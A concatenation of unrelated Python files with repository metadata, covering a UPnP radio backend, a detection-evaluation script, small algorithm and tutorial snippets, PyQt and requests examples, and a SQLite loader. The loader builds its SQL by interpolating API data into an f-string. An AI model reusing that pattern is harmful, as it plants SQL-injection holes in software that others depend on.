    @staticmethod
    def fix(localization, proxy_obj, arguments):
        """Model numpy.fix: the inferred result type is a numpy array.

        Passes the argument through when it is already a numpy array,
        otherwise wraps it into one via call_utilities.
        """
        if call_utilities.is_numpy_array(arguments[0]):
            return arguments[0]
        else:
            return call_utilities.create_numpy_array(arguments[0])
| [
"[email protected]"
]
| |
dbf30296d71e7bf60831a0c340e730a93a7d7a5c | c78d25a2ea56f012da3381d7245c3e08556129e1 | /coherence/backends/radiotime_storage.py | 1f2c5d69ba48ac3beee20a08759cb96b1a85c6c1 | [
"MIT"
]
| permissive | Python3pkg/Cohen | 556ad3952136fc2eafda99202a7280c2ece2477e | 14e1e9f5b4a5460033692b30fa90352320bb7a4e | refs/heads/master | 2021-01-21T17:13:58.602576 | 2017-05-21T08:33:16 | 2017-05-21T08:33:16 | 91,943,281 | 1 | 0 | null | 2017-05-21T08:32:55 | 2017-05-21T08:32:55 | null | UTF-8 | Python | false | false | 7,113 | py | # Licensed under the MIT license
# http://opensource.org/licenses/mit-license.php
# an internet radio media server for the Coherence UPnP Framework
# based on the radiotime (http://radiotime.com) catalog service
# Copyright 2007, Frank Scholz <[email protected]>
# Copyright 2009-2010, Jean-Michel Sizun <jmDOTsizunATfreeDOTfr>
from lxml import etree
from twisted.python.failure import Failure
from coherence.upnp.core import utils
from coherence.upnp.core import DIDLLite
from coherence.upnp.core.DIDLLite import Resource
from coherence.backend import BackendItem, Container, LazyContainer, AbstractBackendStore
OPML_BROWSE_URL = 'http://opml.radiotime.com/Browse.ashx'
# we only handle mp3 audio streams for now
DEFAULT_FORMAT = "mp3"
DEFAULT_MIMETYPE = "audio/mpeg"
# TODO : extend format handling using radiotime API
class RadiotimeAudioItem(BackendItem):
    """A playable radio station built from one RadioTime OPML <outline> node."""
    logCategory = 'radiotime'
    def __init__(self, outline):
        BackendItem.__init__(self)
        # Station attributes come straight from the OPML outline element.
        self.preset_id = outline.get('preset_id')
        self.name = outline.get('text')
        self.mimetype = DEFAULT_MIMETYPE
        self.stream_url = outline.get('URL')
        self.image = outline.get('image')
        #self.location = PlaylistStreamProxy(self.stream_url)
        #self.url = self.stream_url
        # DIDL item is created lazily in get_item().
        self.item = None
    def replace_by (self, item):
        # do nothing: we suppose the replacement item is the same
        return
    def get_item(self):
        """Build (once) and return the DIDL-Lite AudioBroadcast for this station."""
        if self.item == None:
            upnp_id = self.get_id()
            upnp_parent_id = self.parent.get_id()
            self.item = DIDLLite.AudioBroadcast(upnp_id, upnp_parent_id, self.name)
            self.item.albumArtURI = self.image
            # Advertise the stream with DLNA MP3 protocol-info flags.
            res = Resource(self.stream_url, 'http-get:*:%s:%s' % (self.mimetype,
                           ';'.join(('DLNA.ORG_PN=MP3',
                                     'DLNA.ORG_CI=0',
                                     'DLNA.ORG_OP=01',
                                     'DLNA.ORG_FLAGS=01700000000000000000000000000000'))))
            res.size = 0 # None
            self.item.res.append(res)
        return self.item
    def get_path(self):
        # NOTE(review): self.url is only set in the commented-out line of
        # __init__ above — this likely raises AttributeError; verify callers.
        return self.url
    def get_id(self):
        return self.storage_id
class RadiotimeStore(AbstractBackendStore):
    """Coherence UPnP MediaServer backend for the RadioTime OPML catalog.

    Browsing is lazy: each OPML "link" outline becomes a LazyContainer
    that fetches and parses its URL only when the client descends into it.
    """
    logCategory = 'radiotime'
    implements = ['MediaServer']
    def __init__(self, server, **kwargs):
        AbstractBackendStore.__init__(self, server, **kwargs)
        self.name = kwargs.get('name', 'radiotimeStore')
        # Refresh interval: config value is in minutes, stored in seconds.
        self.refresh = int(kwargs.get('refresh', 60)) * 60
        self.browse_url = self.config.get('browse_url', OPML_BROWSE_URL)
        self.partner_id = self.config.get('partner_id', 'TMe3Cn6v')
        self.username = self.config.get('username', None)
        self.locale = self.config.get('locale', 'en')
        self.serial = server.uuid
        # construct URL for root menu: identify by username when
        # configured, otherwise by the server's UUID serial.
        if self.username is not None:
            identification_param = "username=%s" % self.username
        else:
            identification_param = "serial=%s" % self.serial
        formats_value = DEFAULT_FORMAT
        root_url = "%s?partnerId=%s&%s&formats=%s&locale=%s" % (self.browse_url, self.partner_id, identification_param, formats_value, self.locale)
        # set root item
        root_item = LazyContainer(None, "root", "root", self.refresh, self.retrieveItemsForOPML, url=root_url)
        self.set_root_item(root_item)
        self.init_completed()
    def upnp_init(self):
        """Announce supported stream protocols once the UPnP server is ready."""
        self.current_connection_id = None
        # Map Windows Media Connect's audio container onto our root.
        self.wmc_mapping = {'4': self.get_root_id()}
        if self.server:
            self.server.connection_manager_server.set_variable(0, 'SourceProtocolInfo',
                                                               ['http-get:*:audio/mpeg:*',
                                                                'http-get:*:audio/x-scpls:*'],
                                                               default=True)
    def retrieveItemsForOPML (self, parent, url):
        """Fetch the OPML document at `url` and populate `parent` with its outlines.

        Returns a Deferred; on failure the parent is flagged for retry.
        """
        def append_outline(parent, outline):
            type = outline.get('type')
            if type is None:
                # This outline is just a classification item containing other outline elements
                # the corresponding item will a static Container
                text = outline.get('text')
                key = outline.get('key')
                external_id = None
                if external_id is None and key is not None:
                    external_id = "%s_%s" % (parent.external_id, key)
                if external_id is None:
                    external_id = outline_url
                item = Container(parent, text)
                item.external_id = external_id
                item.store = parent.store
                parent.add_child(item, external_id=external_id)
                # Recurse into nested outlines.
                sub_outlines = outline.findall('outline')
                for sub_outline in sub_outlines:
                    append_outline(item, sub_outline)
            elif type == 'link':
                # the corresponding item will a self-populating Container
                text = outline.get('text')
                outline_url = outline.get('URL')
                key = outline.get('key')
                guide_id = outline.get('guide_id')
                # Prefer guide_id, then parent-scoped key, then the URL itself.
                external_id = guide_id
                if external_id is None and key is not None:
                    external_id = "%s_%s" % (parent.external_id, key)
                if external_id is None:
                    external_id = outline_url
                item = LazyContainer(parent, text, external_id, self.refresh, self.retrieveItemsForOPML, url=outline_url)
                parent.add_child(item, external_id=external_id)
            elif type == 'audio':
                item = RadiotimeAudioItem(outline)
                parent.add_child(item, external_id=item.preset_id)
        def got_page(result):
            self.info('connection to Radiotime service successful for url %s', url)
            outlines = result.findall('body/outline')
            for outline in outlines:
                append_outline(parent, outline)
            return True
        def got_error(error):
            self.warning("connection to Radiotime service failed for url %s", url)
            self.debug("%r", error.getTraceback())
            parent.childrenRetrievingNeeded = True # we retry
            return Failure("Unable to retrieve items for url %s" % url)
        def got_xml_error(error):
            self.warning("Data received from Radiotime service is invalid: %s", url)
            #self.debug("%r", error.getTraceback())
            print(error.getTraceback())
            parent.childrenRetrievingNeeded = True # we retry
            return Failure("Unable to retrieve items for url %s" % url)
        # Fetch, parse as XML, then walk the outline tree.
        d = utils.getPage(url, )
        d.addCallback(etree.fromstring)
        d.addErrback(got_error)
        d.addCallback(got_page)
        d.addErrback(got_xml_error)
        return d
| [
"[email protected]"
]
| |
8c929fb80c63833f2b9b8f7f3d79ea501d32a8c2 | 845e3c428e18232777f17b701212dcbb1b72acc1 | /psdbCrop/psdbCropVal1PsdbFourPartsFullDRoiAlignXRoc2.py | 6c8fab7837b147654694a4a4715f353926dee333 | [
"BSD-2-Clause",
"MIT",
"LicenseRef-scancode-generic-cla"
]
| permissive | chuanxinlan/ohem-1 | dd10b2f5ff15e81ab9e42e936bb44d98e01c6795 | b7552ceb8ed1e9768e0d522258caa64b79834b54 | refs/heads/master | 2021-09-16T18:31:25.651432 | 2018-06-23T10:09:24 | 2018-06-23T10:09:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,010 | py | #!/usr/bin/python
import os
import numpy as np
import matplotlib.pyplot as plt
import tools._init_paths
import cPickle
from datasets.factory import get_imdb
import cv2
class EvalConfig(object):
    """Settings for detection evaluation (IoU matching and GT filtering)."""
    # Minimum IoU for a detection to match a ground-truth box.
    iou_thresh = 0.5
    # Ground-truth boxes narrower/shorter than this do not count as positives.
    min_width = 20
    min_height = 20
    # a list of type IDs to evaluate, or None for all
    eval_type = None
    # When True, convert (x, y, w, h) boxes to (x1, y1, x2, y2) on load.
    transform_gt = False
    transform_det = False
def read_bboxes(fin, cls, transform=False):
    """Read one image record from an open annotation file (Python 2).

    File format per record: image name line, count line, then one line
    of whitespace-separated floats per box. Each box line packs 5 values
    per class (label + 4 coords); `cls` selects which 5-tuple is the
    body box, while class index 2 is always taken as the head box.

    Returns a dict with the image name, the number of kept boxes, and
    (num, 4) numpy arrays 'bboxes' (body) and 'heades' (head). num_bbox
    is -1 when the file is exhausted (empty name line).
    """
    im_name = fin.readline().strip()
    bbs = []
    if im_name:
        num_bbox = int(fin.readline().strip())
        if num_bbox > 0:
            for _ in xrange(num_bbox):
                line = fin.readline().rstrip().split()
                line = map(float, line)
                bbs.append(line)
    else:
        # Empty name line: end of file sentinel.
        num_bbox = -1
    key = 0
    bboxes = []
    heades = []
    for i, b in enumerate(bbs):
        # Keep only fully-annotated boxes (negative values mark ignores).
        if min(b) >= 0:
            box = b[(cls - 1) * 5: cls * 5]
            head = b[(2 - 1) * 5: 2 * 5]
            # Drop the leading label value; keep the 4 coordinates.
            bboxes.append(box[1:])
            heades.append(head[1:])
    num_bbox = len(bboxes)
    bboxes = np.array(bboxes)
    heades = np.array(heades)
    if num_bbox > 0:
        if transform:
            # (x, y, w, h) -> (x1, y1, x2, y2), inclusive coordinates.
            bboxes[:, 2:4] += (bboxes[:, :2] - 1)
            heades[:, 2:4] += (heades[:, :2] - 1)
    return {'im_name': im_name,
            'num_bbox': num_bbox,
            'bboxes': bboxes,
            'heades': heades}
def compute_ap(recall, precision):
    """Compute VOC-style average precision from a precision/recall curve.

    Pads the curve with sentinels, replaces precision by its monotone
    (non-increasing) envelope, and integrates precision over the recall
    steps where recall actually changes.
    """
    rec = np.concatenate(([0.], recall, [1.]))
    prec = np.concatenate(([0.], precision, [0.]))
    # Monotone envelope: each point becomes the max precision to its right.
    prec = np.maximum.accumulate(prec[::-1])[::-1]
    # Indices where recall changes value -> width of each integration step.
    step = np.where(rec[1:] != rec[:-1])[0]
    return np.sum((rec[step + 1] - rec[step]) * prec[step + 1])
def get_points(x, y, target_x):
    '''x should be sorted in ascending order'''
    # Sample the piecewise-linear curve (x, y) at each value in target_x:
    # exact hits average all matching y values, in-between targets are
    # linearly interpolated, and targets past the end clamp to the last point.
    xs = np.asarray(x)
    ys = np.asarray(y)
    out_x = []
    out_y = []
    for t in target_x:
        exact = np.where(xs == t)[0]
        if exact.shape[0] > 0:
            # Exact match(es): average the corresponding y values.
            out_y.append(ys[exact].mean())
            out_x.append(t)
            continue
        above = np.where(xs > t)[0]
        if above.shape[0] > 0:
            # Linear interpolation between the neighbors bracketing t.
            hi = above[0]
            w_hi = xs[hi] - t
            w_lo = t - xs[hi - 1]
            out_y.append((ys[hi] * w_lo + ys[hi - 1] * w_hi) / (w_hi + w_lo))
            out_x.append(t)
        else:
            # Target beyond the last sample: clamp to the final point.
            out_y.append(ys[-1])
            out_x.append(xs[-1])
    return out_x, out_y
def getName2Box():
    """Load crop offsets: map crop image name -> list of floats from val1_detail.txt.

    Each line is "<name> <x1> <y1> ...". NOTE(review): the file handle is
    never closed — harmless for a one-shot script, but worth a `with` block.
    """
    name2box = {}
    fValDetail = open('data/psdbCrop/val1_detail.txt', 'r')
    for line in fValDetail:
        line = line.strip().split()
        imagename = line[0]
        # Python 2: map() returns a list of floats here.
        bbox = map(float, line[1:])
        name2box[imagename] = bbox
    return name2box
def getName2Det(cache_file):
    """Load cached per-crop detections and merge them into full-image space.

    Shifts each crop's detections by its crop offset, groups them by the
    original image name, and sorts each group by descending score.
    Returns a dict: '<image>.jpg' -> (N, 5) array of [x1, y1, x2, y2, score].
    """
    name2box = getName2Box()
    # NOTE(review): if cache_file does not exist, detAll is never assigned
    # and the loop below raises NameError — consider failing fast instead.
    if os.path.exists(cache_file):
        with open(cache_file, 'rb') as fid:
            detAll = np.array(cPickle.load(fid))
    psdbCrop = get_imdb('psdbCrop_2015_val1')
    name2det = {}
    for i, imagename in enumerate(psdbCrop.image_index):
        imagename = imagename.strip()
        bbox = name2box[imagename]
        # Row 1 holds the detections of the evaluated class for crop i.
        det = detAll[1, i]
        # Translate crop-local coordinates to full-image coordinates.
        det[:, 0] += bbox[0]
        det[:, 2] += bbox[0]
        det[:, 1] += bbox[1]
        det[:, 3] += bbox[1]
        # det[:, 4] *= bbox[4]
        # Crop names look like "<prefix>_<image>"; recover the image file name.
        imagename = imagename.split('_')[1] + '.jpg'
        if imagename in name2det:
            name2det[imagename] = np.vstack((
                name2det[imagename], det))
        else:
            name2det[imagename] = det
    # Sort each image's detections by score, highest first.
    for imagename in name2det:
        sort_idx = np.argsort(name2det[imagename][:, 4])[::-1]
        name2det[imagename] = name2det[imagename][sort_idx]
    return name2det
def eval_roc_pr(config, gt_file, det_file, cls):
    """Match detections to ground truth and return ROC/PR statistics.

    For every image, each detection of class `cls` is greedily matched to
    the not-yet-matched ground-truth box with the highest IoU above
    config.iou_thresh; matched detections count as true positives, the
    rest as false positives.  From the confidence-ranked TP/FP counts the
    function derives recall, precision, FPPI (false positives per image
    that had detections) and VOC-style AP.
    NOTE: Python 2 code (xrange, print statement).
    """
    name2det = getName2Det(det_file)
    psdbFourParts = get_imdb('psdbFourParts_2015_test')
    psdbFourPartsLen = len(psdbFourParts.image_index)
    default_iou_thresh = config.iou_thresh
    min_width = config.min_width
    min_height = config.min_height
    eval_type = config.eval_type
    assert os.path.exists(gt_file)
    det_conf = []
    det_tp = []
    det_fp = []
    pos_count = 0
    bbox_count = 0
    im_count = 0
    detId = 0
    with open(gt_file, 'r') as fgt:
        for gtId in xrange(psdbFourPartsLen):
            gt = read_bboxes(fgt, cls, transform=config.transform_gt)
            imagename = gt['im_name'].strip()
            if imagename in name2det:
                det = name2det[imagename]
            else:
                det = np.zeros((0, 5))
            num_gt = gt['num_bbox']
            iou_thresh = [default_iou_thresh] * num_gt
            gt_hit_mask = [False] * num_gt
            if num_gt > 0:
                # Count positives large enough to be evaluated (all boxes
                # qualify when min_width/min_height are 0).
                mask_pos = [True] * num_gt
                num_pos = len(np.where(mask_pos &
                    (gt['heades'][:, 2] - gt['heades'][:, 0] >= min_width) &
                    (gt['heades'][:, 3] - gt['heades'][:, 1] >= min_height))[0])
            else:
                num_pos = 0
            pos_count += num_pos
            bbox_count += num_gt
            num_det = det.shape[0]
            if num_det > 0:
                det_conf.append(det[:, 4])
                det_tp.append(np.zeros(num_det))
                det_fp.append(np.zeros(num_det))
            fp_box = []
            fp_box_iou = []
            for i in xrange(num_det):
                max_iou = -np.inf
                max_idx = -1
                det_bbox = det[i, :4]
                iou = 0
                for j in xrange(num_gt):
                    # Each ground-truth box can be matched at most once.
                    if gt_hit_mask[j] or not mask_pos[j]:
                        continue
                    gt_bbox = gt['heades'][j, :4]
                    '''
                    im = cv2.imread(os.path.join(
                        'data', 'psdb', 'image', gt['im_name']))
                    # im = im [det_bbox[1]:det_bbox[3], det_bbox[0]:det_bbox[2]]
                    im = im [gt_bbox[1]:gt_bbox[3], gt_bbox[0]:gt_bbox[2]]
                    cv2.imshow('x', im)
                    cv2.waitKey()
                    '''
                    x1 = max(det_bbox[0], gt_bbox[0])
                    y1 = max(det_bbox[1], gt_bbox[1])
                    x2 = min(det_bbox[2], gt_bbox[2])
                    y2 = min(det_bbox[3], gt_bbox[3])
                    w = x2 - x1 + 1
                    h = y2 - y1 + 1
                    if w > 0 and h > 0:
                        # IoU with the pixel-inclusive (+1) area convention.
                        s1 = (det_bbox[2] - det_bbox[0] + 1) * (det_bbox[3] - det_bbox[1] + 1)
                        s2 = (gt_bbox[2] - gt_bbox[0] + 1) * (gt_bbox[3] - gt_bbox[1] + 1)
                        s3 = w * h
                        iou = s3 / (s1 + s2 - s3)
                        if iou > iou_thresh[j] and iou > max_iou:
                            max_iou = iou
                            max_idx = j
                if max_idx >= 0:
                    det_tp[im_count][i] = 1
                    gt_hit_mask[max_idx] = True
                else:
                    det_fp[im_count][i] = 1
                    fp_box.append(det[i, :])
                    fp_box_iou.append(iou)
            # im_count only counts images that produced detections; it is
            # also the denominator of the FPPI statistic below.
            if num_det>0:
                im_count = im_count + 1
    # Rank every detection by confidence, then accumulate TP/FP counts.
    det_conf = np.hstack(det_conf)
    det_tp = np.hstack(det_tp)
    det_fp = np.hstack(det_fp)
    sort_idx = np.argsort(det_conf)[::-1]
    det_tp = np.cumsum(det_tp[sort_idx])
    det_fp = np.cumsum(det_fp[sort_idx])
    keep_idx = np.where((det_tp > 0) | (det_fp > 0))[0]
    det_tp = det_tp[keep_idx]
    det_fp = det_fp[keep_idx]
    recall = det_tp / pos_count
    precision = det_tp / (det_tp + det_fp)
    fppi = det_fp / im_count
    # NOTE(review): the debug prints below index the *unsorted* det_conf
    # with a count derived from the sorted fppi curve — verify before
    # trusting the printed confidence threshold.
    print('fppi = 0.1')
    myIdx = np.sum(fppi<=0.1)
    print('myIdx', myIdx)
    print('fppi[myIdx]', fppi[myIdx])
    print('det_conf[myIdx]', det_conf[myIdx])
    '''
    print('')
    print('fppi = 1')
    myIdx = np.sum(fppi<=1)
    print('myIdx', myIdx)
    print('fppi[myIdx]', fppi[myIdx])
    print('det_conf[myIdx]', det_conf[myIdx])
    print('')
    '''
    ap = compute_ap(recall, precision)
    fppi_pts, recall_pts = get_points(fppi, recall, [0.1])
    stat_str = 'AP = {:f}\n'.format(ap)
    for i, p in enumerate(fppi_pts):
        stat_str += 'Recall = {:f}, Miss Rate = {:f} @ FPPI = {:s}'.format(recall_pts[i], 1 - recall_pts[i], str(p))
    print stat_str
    return {'fppi': fppi, 'recall': recall, 'precision': precision, 'ap': ap,
            'recall_pts': recall_pts, 'fppi_pts': fppi_pts}
def plot_roc(data, id):
    """Plot recall vs. FPPI (log x-axis) for each result dict in `data`.

    `data` is a list of result dicts from eval_roc_pr; `id` supplies the
    legend label per curve (note: the parameter shadows the builtin id).
    """
    plt.figure()
    for i, r in enumerate(data):
        plt.plot(r['fppi'], r['recall'], label=id[i], linewidth=2.0)
    plt.draw()
    ax = plt.gca()
    ax.set_ylim([0, 1])
    ax.set_xscale('log')
    plt.xlabel('FPPI', fontsize=16)
    plt.ylabel('Recall', fontsize=16)
    plt.legend(loc='upper left', fontsize=10)
    plt.title('ROC Curve')
    plt.grid(b=True, which='major', color='b', linestyle='-')
    plt.grid(b=True, which='minor', color='b', linestyle=':')
def plot_pr(data, id):
    """Plot precision vs. recall for each result dict in `data`.

    `data` is a list of result dicts from eval_roc_pr; `id` supplies the
    legend label per curve (note: the parameter shadows the builtin id).
    """
    plt.figure()
    for i, r in enumerate(data):
        plt.plot(r['recall'], r['precision'], label=id[i], linewidth=2.0)
    plt.draw()
    ax = plt.gca()
    ax.set_xlim([0, 1])
    ax.set_ylim([0, 1])
    plt.xlabel('Recall', fontsize=16)
    plt.ylabel('Precision', fontsize=16)
    plt.legend(loc='lower left', fontsize=10)
    plt.title('PR Curve')
    plt.grid(b=True, which='major', color='b', linestyle='-')
    plt.grid(b=True, which='minor', color='b', linestyle=':')
    plt.minorticks_on()
def plot_curves(eval_result, curve_id):
    """Render the ROC curve(s) and save the figure to psdbCropVal1.png."""
    plot_roc(eval_result, curve_id)
    # plot_pr(eval_result, curve_id)
    plt.savefig('psdbCropVal1.png')
if __name__ == '__main__':
    # Evaluation settings: IoU threshold for a match, no size filtering.
    config = EvalConfig()
    config.iou_thresh = 0.5
    config.min_width = 0
    config.min_height = 0
    config.eval_type = [0, 1, 2, 3, 4, 5]
    config.transform_gt = True
    config.transform_det = False
    gt_file = 'data/psdb/phsb_rect_byimage_test.txt'
    # range(10, 9, -1) yields only i = 10: evaluates the iter-100000
    # snapshot (the loop form is left over from sweeping checkpoints).
    for i in range(10, 9, -1):
        print("Iteration", i)
        cacheFilename = \
            'output/pvanet_full1_ohem_DRoiAlignX/psdbCrop_val1/zf_faster_rcnn_iter_' + str(i) + \
            '0000_inference/detections.pkl'
        if (os.path.exists(cacheFilename)):
            eval_result = []
            # Only class 1 ("head") is evaluated.
            for cls in range(1, 2):
                result = eval_roc_pr(config, gt_file, cacheFilename, cls)
                eval_result.append(result)
            det_id = ['head']
            plot_curves(eval_result, det_id)
            det_file = os.path.join('psdbCrop-psdbFourParts-fppi1-Ohem-pvanet-DRoiAlignX-' + str(i) +'.pkl')
            with open(det_file, 'wb') as f:
                cPickle.dump(eval_result, f, cPickle.HIGHEST_PROTOCOL)
| [
"[email protected]"
]
| |
630bdd5c13f4ec241b016ee6636bfe70af9b1448 | 01822d2ae38a95edcd188a51c377bb07b0a0c57d | /Assignments/Sprint3/FindAllPaths.py | faf38a0af57c11891b1ec51c5c26b3865f784c23 | [
"MIT"
]
| permissive | mark-morelos/CS_Notes | bc298137971295023e5e3caf964fe7d3f8cf1af9 | 339c47ae5d7e678b7ac98d6d78857d016c611e38 | refs/heads/main | 2023-03-10T11:56:52.691282 | 2021-03-02T15:09:31 | 2021-03-02T15:09:31 | 338,211,631 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,496 | py | """
Understand
Note: For some reason, it's failing one of the tests. I
think it's because the test case didn't sort their output.
In that case, the test is wrong :)
Drawing graphs via text are a pain, so I'm just gonna use the example given
Plan
1. Translate the problem into graph terminology
- Each index in the list given is a node
- Each subarray are the node's outgoing edges to its neighbors
2. Build your graph
- The graph is actually already built for us. We can traverse
the given list like a graph since
we have access to the node we're at and its neighbors.
3. Traverse the graph
- Any type of traversal would work, we just need to keep
track of the path that we've currently taken
- We add that path to the result once we reach the destination node
- Note that we don't need a visited set since we're
guaranteed that the graph is a DAG
Runtime: O(number of nodes^2)
Space: O(number of nodes^2)
Imagine a dense graph
"""
from collections import deque
def csFindAllPathsFromAToB(graph):
    """Return every path from node 0 to node len(graph) - 1 in a DAG.

    graph[i] lists the outgoing neighbours of node i.  Paths are returned
    as node lists, sorted lexicographically.  The input is guaranteed to
    be acyclic, so no visited-set is needed.
    """
    target = len(graph) - 1
    paths = []
    pending = [(0, [0])]
    while pending:
        node, path_so_far = pending.pop()
        for nxt in graph[node]:
            extended = path_so_far + [nxt]
            if nxt == target:
                paths.append(extended)
            else:
                pending.append((nxt, extended))
    return sorted(paths)
"[email protected]"
]
| |
d99058ae8efde20b0b9a94917310bf9294bf3d79 | 3d4094d6eca69329d4c6ba08e0c8ce79eedeb6b6 | /starter/While.py | af86daef2ae3d6572815e944274601b1454dd277 | []
| no_license | agkozik/Python_Course | c9f3c8b68e60b452e57f43da7554c13daf386a0c | 4b095bbc86f33999efe95127528b3e1d8bfded9f | refs/heads/master | 2022-04-27T06:04:15.276472 | 2020-04-22T11:49:06 | 2020-04-22T11:49:06 | 255,082,012 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,286 | py | # # ---------------------- while true ----------------------------
#
# message = ""
# while message != "exit":
# message = input("Type exit to exit: ")
#
# # ---------------------- while int true ----------------------------
# n = 1
# while n <= 3:
# print("n = ", n)
# n += 1
#
# # ---------------------- while enter a positive number --------
# number = 0
# while number <= 0:
# number = int(input("Enter a positive number: "))
# print("Your number is ", number)
# # ---------------------- Break --------------------------------
# i = 1
# while True:
# print("Iterataion ", i)
# i += 1
# if i == 10:
# break
# print("Loop has stopped")
# # ---------------------- Continue -----------------------------
# n = 0
# while n < 10:
# n += 1;
# if n == 5:
# print("Value 5 skipped because of continue operator")
# continue
# print(n)
# # ---------------------- While with Else ----------------------------
# Give the user three attempts at the password.  The `else` clause of a
# while loop runs only when the loop finishes WITHOUT hitting `break`,
# i.e. when every attempt was used up.
attempts_left = 3
while attempts_left > 0:
    attempts_left -= 1
    password = input("Please, enter Password ["
                     "you have {} attempt(s) ]: ".format(attempts_left + 1))
    if password == '1234':
        print("Correct password, signing...")
        break
else:
    print("You lost all attempts.")
| [
"[email protected]"
]
| |
6c7d9885d0519d18a161ee398e1f83753b821006 | 65a32b8a8a97c126843d2cfe79c43193ac2abc23 | /chapter9/local_var.py | 1816492d4b38b735cc5262f0aabbb32c1c380b9e | []
| no_license | zhuyuedlut/advanced_programming | 9af2d6144e247168e492ddfb9af5d4a5667227c4 | a6e0456dd0b216b96829b5c3cef11df706525867 | refs/heads/master | 2023-03-19T09:21:31.234000 | 2020-10-09T13:09:38 | 2020-10-09T13:09:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 809 | py | a = 20
exec('b = a + 1')
print(f'b = {b}')
# def test():
# a = 20
# exec('b = a + 1')
# print(f'b = {b}')
#
# test()
def test():
a = 20
loc = locals()
exec('b = a + 1')
b = loc['b']
print(f't: b = {b}')
test()
def test_1():
x = 0
exec('x += 1')
print(f't1: x = {x}')
test_1()
def test_2():
x = 0
loc = locals()
print(f't2 before: {loc}')
exec('x += 1')
print(f't2 after: {loc}')
print(f't2: x = {x}')
test_2()
def test_3():
x = 0
loc = locals()
print(f't3: loc = {loc}')
exec('x += 1')
print(f't3: loc = {loc}')
locals()
print(f't3: loc = {loc}')
test_3()
def test_4():
a = 20
loc = {'a': a}
glb = {}
exec('b = a + 1', glb, loc)
b = loc['b']
print(f't4: b = {b}')
test_4() | [
"[email protected]"
]
| |
0512aa9369f8d18ed59f628853a123ff95d586bc | 74912c10f66e90195bf87fd71e9a78fa09f017ec | /execroot/syntaxnet/bazel-out/local-opt/bin/dragnn/python/graph_builder_test.runfiles/org_tensorflow/tensorflow/contrib/learn/python/learn/tests/dataframe/__init__.py | 31d718df713532da6c36386b67220f0d1e6e878f | []
| no_license | koorukuroo/821bda42e7dedbfae9d936785dd2d125- | 1f0b8f496da8380c6e811ed294dc39a357a5a8b8 | 237fcc152ff436f32b2b5a3752a4181d279b3a57 | refs/heads/master | 2020-03-17T03:39:31.972750 | 2018-05-13T14:35:24 | 2018-05-13T14:35:24 | 133,244,956 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | /root/.cache/bazel/_bazel_root/821bda42e7dedbfae9d936785dd2d125/external/org_tensorflow/tensorflow/contrib/learn/python/learn/tests/dataframe/__init__.py | [
"k"
]
| k |
46bb827c374c723df2920b4765f45cafad5d8454 | 50402cc4388dfee3a9dbe9e121ef217759ebdba8 | /demo/testPyQt/test3.py | 6c42882d89fc51c0eae08cdf2e7c23b542794f04 | []
| no_license | dqyi11/SVNBackup | bd46a69ec55e3a4f981a9bca4c8340944d8d5886 | 9ad38e38453ef8539011cf4d9a9c0a363e668759 | refs/heads/master | 2020-03-26T12:15:01.155873 | 2015-12-10T01:11:36 | 2015-12-10T01:11:36 | 144,883,382 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 928 | py | '''
Created on Apr 22, 2014
@author: walter
'''
import sys
from PyQt4 import QtGui
class Example(QtGui.QMainWindow):
    """Main window demonstrating a menubar with an Exit action (PyQt4)."""
    def __init__(self):
        super(Example, self).__init__()
        self.initUI()
    def initUI(self):
        # Exit action: icon, Ctrl+Q shortcut, status-bar tip, wired to
        # quit the application.
        exitAction = QtGui.QAction(QtGui.QIcon('exit.png'), '&Exit', self)
        exitAction.setShortcut('Ctrl+Q')
        exitAction.setStatusTip('Exit application')
        exitAction.triggered.connect(QtGui.qApp.quit)
        self.statusBar()
        menubar = self.menuBar()
        fileMenu = menubar.addMenu('&File')
        fileMenu.addAction(exitAction)
        # Window geometry: x, y, width, height.
        self.setGeometry(300, 300, 300, 200)
        self.setWindowTitle('Menubar')
        self.show()
def main():
    """Create the QApplication, show the demo window, run the event loop."""
    app = QtGui.QApplication(sys.argv)
    ex = Example()
    sys.exit(app.exec_())
if __name__ == '__main__':
    main()
| [
"walter@e224401c-0ce2-47f2-81f6-2da1fe30fd39"
]
| walter@e224401c-0ce2-47f2-81f6-2da1fe30fd39 |
c9ca634b1cfd0a70676f197430bc0680ce1077d0 | 8928c4745515ffecfc581da36df47b0789fb463f | /Chapter_9/formsub.py | 51ea5e0fe04bad40167a6fc40016825b997f0e1d | []
| no_license | iluxonchik/webscraping-with-python-book | 72da36ba8fae016ccc20d44753ec4c46bc933dee | ffc5a1459778649d081c62812c8d3edbb2f120a9 | refs/heads/master | 2021-01-10T10:19:12.443341 | 2016-01-21T21:50:11 | 2016-01-21T21:50:11 | 48,058,040 | 1 | 3 | null | null | null | null | UTF-8 | Python | false | false | 302 | py | import requests
# Submit a simple form via POST.
params = {'firstname': 'hello', 'lastname': 'there'}
r = requests.post("http://pythonscraping.com/files/processing.php", data=params)
print(r.text)
# Upload a file.  Open it inside a context manager so the descriptor is
# closed even if the request raises — the original open() leaked the handle.
with open('1.png', 'rb') as upload:
    files = {'uploadFile': upload}
    r = requests.post("http://pythonscraping.com/files/processing2.php", files=files)
print(r.text) | [
"[email protected]"
]
| |
e7df1ffbd062f8f616fff956e0482311a709c86a | e4d4149a717d08979953983fa78fea46df63d13d | /Week6/Day5/DailyChallenge.py | 68788690cf6a298238eff2f8a5648c48d64c3f7a | []
| no_license | fayblash/DI_Bootcamp | 72fd75497a2484d19c779775c49e4306e602d10f | a4e8f62e338df5d5671fd088afa575ea2e290837 | refs/heads/main | 2023-05-05T20:55:31.513558 | 2021-05-27T06:48:40 | 2021-05-27T06:48:40 | 354,818,813 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 615 | py | import sqlite3 as sl
from time import time
import requests
import json
connection=sl.connect("countries.db")
cursor=connection.cursor()
start=time()
for i in range(10,21):
data=requests.get("https://restcountries.eu/rest/v2/all")
country=data.json()
print (country[i]['name'])
query=f"INSERT INTO countries(name,capital,flag,subregion,population) VALUES ('{country[i]['name']}','{country[i]['capital']}','{country[i]['flag']}','{country[i]['subregion']}','{country[i]['population']}')"
cursor.execute(query)
connection.commit()
connection.close()
end=time()
print(end-start)
| [
"[email protected]"
]
| |
